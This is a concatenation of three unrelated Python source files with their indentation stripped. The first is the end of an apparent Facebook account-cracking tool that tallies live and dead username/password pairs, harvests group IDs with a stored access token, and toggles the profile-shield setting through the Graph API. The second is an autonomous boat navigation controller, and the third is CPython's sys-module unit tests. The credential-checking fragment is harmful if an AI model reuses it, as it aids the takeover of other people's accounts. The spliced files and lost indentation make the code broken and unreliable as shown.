print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
PBC_auto_brain.py
|
import time
import datetime as dt
import serial
from queue import Queue, Empty
from threading import Thread
import numpy as np
import os, sys
import maestro
from haversine import RangeAndBearing
# serial setups
time.sleep(0.25)
RCSer = serial.Serial('/dev/ttyUSB0',baudrate = 115200) # port varies depending on which adapter is plugged in first
time.sleep(0.25)
SensorSer = serial.Serial('/dev/ttyACM0',baudrate = 115200) # consistent
time.sleep(0.25)
# maestro setup
Maestro = maestro.Controller('/dev/ttyACM1')
SteerChannel = 6
MotorChannel = 8
# servo settings, the 4x mult is due to quarter microsecs
microSecMin = 4*750 # -- turns boat left
microSecMax = 4*2500 # -- turns boat right
Maestro.setRange(SteerChannel, microSecMin, microSecMax)
Maestro.setAccel(SteerChannel,254) # basically max
Maestro.setSpeed(SteerChannel,100) # 0-255, close to max but slightly unknown; see the maestro code for more info
PWMlow = 0
PWMhigh = 127
# steering params
MAXRIGHT = 20
MAXLEFT = -20
def ScaleFxn(x, fromLow, fromHigh, toLow, toHigh):
x = (((x - fromLow) * (toHigh - toLow)) / (fromHigh - fromLow)) + toLow
return x
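# Example with hypothetical values: ScaleFxn(50, -100, 100, -20, 20) linearly remaps a
# half-right stick input of 50 from the -100..100 input range onto the -20..20 steering
# range and returns 10. The function does not clip, so out-of-range inputs map outside
# toLow..toHigh; clipping happens later in the main loop.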
def ListenForRCData(RCStatusQueue):
RC_data_loc = [0, 0, 0, 0] # [AUTO, WAYPT, SteerInput, ThrotInput]
RC_data_send = [0, 0, 0, 0]
RC_steer_hist = [0]*10 # moving filter
while True:
# listen for RC data for the Ardu and send it into the queue
rawRCdata = RCSer.readline()
try:
rawRCdata = rawRCdata.decode("utf-8")
if "Man" in rawRCdata:
RC_data_loc[0] = 0
elif "Aut" in rawRCdata:
RC_data_loc[0] = 1
if "WpLo" in rawRCdata:
RC_data_loc[1] = 0
elif "WpHi" in rawRCdata:
RC_data_loc[1] = 1
if len(rawRCdata.split("%")) > 1:
RC_steer_hist.append(float(rawRCdata.split("%")[0])) # steer cmd
RC_steer_hist.pop(0)
RC_data_loc[2] = np.mean(RC_steer_hist)
RC_data_loc[3] = float(rawRCdata.split("%")[1]) # throt cmd
## print('rc data: ',RC_data_loc)
RCSer.reset_input_buffer()
except Exception:
print('error in rc data thread')
# put in queue
if RC_data_loc != RC_data_send:
RC_data_send = RC_data_loc.copy()
RCStatusQueue.put(RC_data_send)
def ListenForSensorData(GPSQueue, CompassQueue):
GPS_data_loc = [0,0,0,0,0,0] # [fix, quality, lat, lon, spd, ang]
GPS_data_send = [0,0,0,0,0,0]
Compass_data_loc = [0]
Compass_data_send = [0]
while True:
# listen for compass and gps data
rawsensorData = SensorSer.readline()
try:
rawsensorData = rawsensorData.decode("utf-8")
if "(deg)" in rawsensorData:
Compass_data_loc[0] = float(rawsensorData.split(' ')[-1])
elif "Fix:" in rawsensorData:
s = rawsensorData.find(":")
if rawsensorData[s+2].isdigit(): GPS_data_loc[0] = int(rawsensorData[s+2])
s = rawsensorData.find(":",s+2)
if rawsensorData[s+2].isdigit(): GPS_data_loc[1] = int(rawsensorData[s+2])
elif "Loc" in rawsensorData:
rawsensorData = rawsensorData[rawsensorData.find('Loc')+3:].split(',')
GPS_data_loc[2] = float(rawsensorData[0])
GPS_data_loc[3] = float(rawsensorData[1])
elif "(knts)" in rawsensorData:
GPS_data_loc[4] = float(rawsensorData.split(' ')[-1])
elif "Ang " in rawsensorData:
GPS_data_loc[5] = float(rawsensorData.split(' ')[-1])
SensorSer.reset_input_buffer()
else:
pass
except Exception:
print('error in sensor data thread')
pass
# put in queue
if GPS_data_loc != GPS_data_send:
GPS_data_send = GPS_data_loc.copy()
GPSQueue.put(GPS_data_send)
if Compass_data_loc != Compass_data_send:
Compass_data_send = Compass_data_loc.copy()
CompassQueue.put(Compass_data_send)
# start the listener threads
RCStatusQueue = Queue()
RCListenerThread = Thread(target=ListenForRCData, args=(RCStatusQueue,))
RCListenerThread.daemon = True # setDaemon() is deprecated in favor of the daemon attribute
RCListenerThread.start()
print('started RCListenerThread thread...')
GPSQueue = Queue()
CompassQueue = Queue()
SensorListenerThread = Thread(target=ListenForSensorData, args=(GPSQueue,CompassQueue,))
SensorListenerThread.daemon = True
SensorListenerThread.start()
print('started SensorListenerThread thread...')
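# Descriptive note on the control loop below: the two daemon listener threads push RC,
# GPS, and compass updates onto queues; each pass of the main loop drains those queues,
# runs rising/falling edge detection on the AUTO and WAYPT switches, computes steering
# and throttle commands (manual pass-through, or waypoint tracking in AUTO), and writes
# to the Maestro only when LoopTargetTime has elapsed. The elapsed-time check uses
# .microseconds, which wraps every second, so it assumes individual passes stay short.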
LoopTargetTime = 10 # milliseconds
Timer_Hz = dt.datetime.now()
over_count = 0
general_count = 0
###########
RC_data = []
AUTO = False
WAYPT = False
SteerInput = 0 # ~ input -100 - +100, but not actually
SteerCmd = 0 # output -20 - 20
ThrotInput = 0 # ~ input -100 - +100, but not actually
ThrotCmd = 0 # output, 0 - 100
AUTO_RisingEdge = False
AUTO_FallingEdge = False
WAYPT_RisingEdge = False
AutoFlag = False
WptFlag = False
IDLE = False # post race completion mode
GPSfix = 0
GPSquality = 0
GPSlat = 0.0
GPSlon = 0.0
GPSspd = 0.0
GPSang = 0.0
Compass = 0.0
CompassOffset = 90 # Believe the rotation is +90 to the heading
wptRadius = 5 # meters, ~ 15 feet
# try to load waypoint array
if os.path.isfile('WayPoints.npy'):
WayPoints = np.load('WayPoints.npy')
else:
WayPoints = np.zeros((20,2)) # 20 waypoints of Lat Long
wptInd = 0 # which waypoint
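# WayPoints.npy persists logged waypoints across runs; each row is (lat, lon) and unused
# rows remain zero. Logging a waypoint in manual mode zeroes every row past the current
# index and rewrites the file, and a (0, 0) row is what later marks the end of the mission.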
try:
while True:
loop_start = dt.datetime.now() # update loop clock
# ------------- DATA inputs -------------------
# check RC queue for new data
while not RCStatusQueue.empty():
RC_data = RCStatusQueue.get()
# parse this into
AUTO = RC_data[0]
WAYPT = RC_data[1]
SteerInput = RC_data[2]
ThrotInput = RC_data[3]
# check GPS queue for new data
while not GPSQueue.empty():
GPS_data = GPSQueue.get()
# parse this into
GPSfix = GPS_data[0]
GPSquality = GPS_data[1]
GPSlat = GPS_data[2]
GPSlon = GPS_data[3]
GPSspd = GPS_data[4]
GPSang = GPS_data[5]
# check Compass queue for new data
while not CompassQueue.empty():
Compass_data = CompassQueue.get()
# parse this into
Compass = Compass_data[0] + CompassOffset
if Compass > 360: Compass = Compass - 360
# ------- edge detection -----------
if AUTO and not AutoFlag:
AUTO_RisingEdge = True
AutoFlag = True
else:
AUTO_RisingEdge = False
if not AUTO and AutoFlag:
AUTO_FallingEdge = True
AutoFlag = False
else:
AUTO_FallingEdge = False
if WAYPT and not WptFlag:
WAYPT_RisingEdge = True
WptFlag = True
else:
WAYPT_RisingEdge = False
if not WAYPT: WptFlag = False # reset the flag
# -- END - edge detection -----------
# ----- END ---- DATA inputs -------------------
if not AUTO: # manual mode
if WAYPT_RisingEdge:
print('Logging waypoint to wpt array')
#append gps
WayPoints[wptInd,0] = GPSlat
WayPoints[wptInd,1] = GPSlon
WayPoints[wptInd+1:,:]=0 # zero the array past this point
wptInd += 1 # uptick wpt array
np.save('WayPoints.npy',WayPoints)
print(WayPoints)
# ---------- Calculate control signals -------------------
SteerCmd = int(ScaleFxn(SteerInput,-100,100,-20,20))
ThrotCmd = int(ScaleFxn(ThrotInput,-100,100,0,100))
# ---- END - Calculate control signals -------------------
if AUTO_RisingEdge:
wptInd = 0
if AUTO_FallingEdge:
wptInd = 0
IDLE = False
DEBUG = False
if AUTO:
if not GPSfix and not DEBUG: print('no GPS fix... waiting...')
elif GPSfix or DEBUG:
if IDLE:
SteerCmd = 0
ThrotCmd = 0
else:
WptLat = WayPoints[wptInd,0]
WptLon = WayPoints[wptInd,1]
## GPSlat = 32.750330
## GPSlon = -117.202724
## sims = [[32.750407,-117.193167],[32.756678,-117.195709],[32.754522,-117.216169],[32.743998,-117.223547],[32.733403,-117.202390]]
## WptLat = sims[0][0]
## WptLon = sims[0][1]
Range, Bearing = RangeAndBearing(GPSlat,GPSlon,WptLat,WptLon)
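# Assumption: RangeAndBearing (from the local haversine module) returns the great-circle
# distance in meters and a bearing in degrees roughly in the -180..180 range. The
# transforms below rely on that convention; the helper's exact contract is not shown here.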
## print('Distance: ', Range,' in meters')
## print('Bearing to next wpt: ',Bearing)
if Range < wptRadius:
print(' ')
print('Waypoint ',wptInd,' hit!!')
wptInd += 1
if WayPoints[wptInd,0] == 0 or WayPoints[wptInd,1] == 0:
IDLE = True
print(' ')
print('MISSION COMPLETE')
if not IDLE:
# transform Bearing to be 0-360 with 0 being east
if 0 <= Bearing <= 180: B = Bearing # include 0 so B is always assigned before use
elif Bearing < 0:
B = 360 - abs(Bearing)
# transform H to be 0 east
H = Compass - 90
if H < 0: H = 360 + H # wrap negative headings back into 0-360
H = abs(360-H)
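# Turn decision: B (bearing to the waypoint) and H (current heading) are now on the same
# 0-360 scale, and the branches below steer whichever way closes the gap the short way
# around. Worked example with hypothetical numbers: B = 30, H = 300 gives B - H = -270,
# which is < -180, so the boat turns left by 360 - 270 = 90 degrees (SteerCmd = -90,
# negative meaning left); the command is then clipped to the -20..20 range before the
# servo write.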
if 0 < B - H < 180:
# turn left
SteerCmd = -1*(B-H)
print('Bearing: ',B,' Heading: ',H,' turn left')
elif 180 <= B - H:
# turn right
SteerCmd = 360 - (B - H) # wrap the short way around; positive command steers right
print('Bearing: ',B,' Heading: ',H,' turn right')
elif -180 < B - H < 0:
# turn right
SteerCmd = -1*(B-H)
print('Bearing: ',B,' Heading: ',H,' turn right')
elif B - H < -180:
# turn left
SteerCmd = -360 - B + H
print('Bearing: ',B,' Heading: ',H,' turn left')
ThrotCmd = 100 # full speed ahead...
if (dt.datetime.now() - Timer_Hz).microseconds >= LoopTargetTime*1000:
Timer_Hz = dt.datetime.now()
# ---------- write control signals -------------------
if SteerCmd > 20: SteerCmd = 20 # clipping
elif SteerCmd < -20: SteerCmd = -20 # clipping
if -2 <= SteerCmd <= 2: SteerCmd = 0 # create a toleranced deadband
Maestro.setTarget(SteerChannel,int(ScaleFxn(SteerCmd,-20,20,microSecMin,microSecMax)))
if ThrotCmd > 85: ThrotCmd = 100 # clipping and also helping get full throttle out of the motor
if ThrotCmd < 4: ThrotCmd = 0 # create a toleranced deadband
MotorSendValue = int(ScaleFxn(ThrotCmd,0,100,PWMlow,PWMhigh))
if MotorSendValue < 80: MotorSendValue = 0 # clip since 80 is about the lowest to get motion due to friction and start torque
Maestro.setPWM(MotorChannel,MotorSendValue) # 0 - 127
# ---- END - write control signals -------------------
except KeyboardInterrupt:
pass
|
test_sys.py
|
import unittest, test.support
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
try:
import threading
except ImportError:
threading = None
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit as exc:
self.assertEqual(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit(42)
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit((42,))
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit as exc:
self.assertEqual(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit as exc:
self.assertEqual(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def check_exit_message(code, expected, env=None):
process = subprocess.Popen([sys.executable, "-c", code],
stderr=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 1)
self.assertTrue(stderr.startswith(expected),
"%s doesn't start with %s" % (ascii(stderr), ascii(expected)))
# test that the stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
env = os.environ.copy()
env['PYTHONIOENCODING'] = 'latin-1'
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", env=env)
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, 'gettrace') and sys.gettrace(),
'fatal error if run with a trace function')
def test_recursionlimit_recovery(self):
# NOTE: this test is slightly fragile in that it depends on the current
# recursion count when executing the test being low enough so as to
# trigger the recursion recovery detection in the _Py_MakeEndRecCheck
# macro (see ceval.h).
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for i in (50, 1000):
# Issue #5392: stack overflow after hitting recursion limit twice
sys.setrecursionlimit(i)
self.assertRaises(RuntimeError, f)
self.assertRaises(RuntimeError, f)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
if os.name == "nt":
raise unittest.SkipTest(
"under Windows, test would generate a spurious crash dialog")
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RuntimeError:
f()
sys.setrecursionlimit(%d)
f()""")
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertTrue(
b"Fatal Python error: Cannot recover from stack overflow" in err,
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.support.reap_threads
def current_frames_with_threads(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 5)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
@unittest.skipUnless(hasattr(sys, 'thread_info'),
'Threading required for this test.')
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'os2', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, "\xa2\n".encode("cp424"))
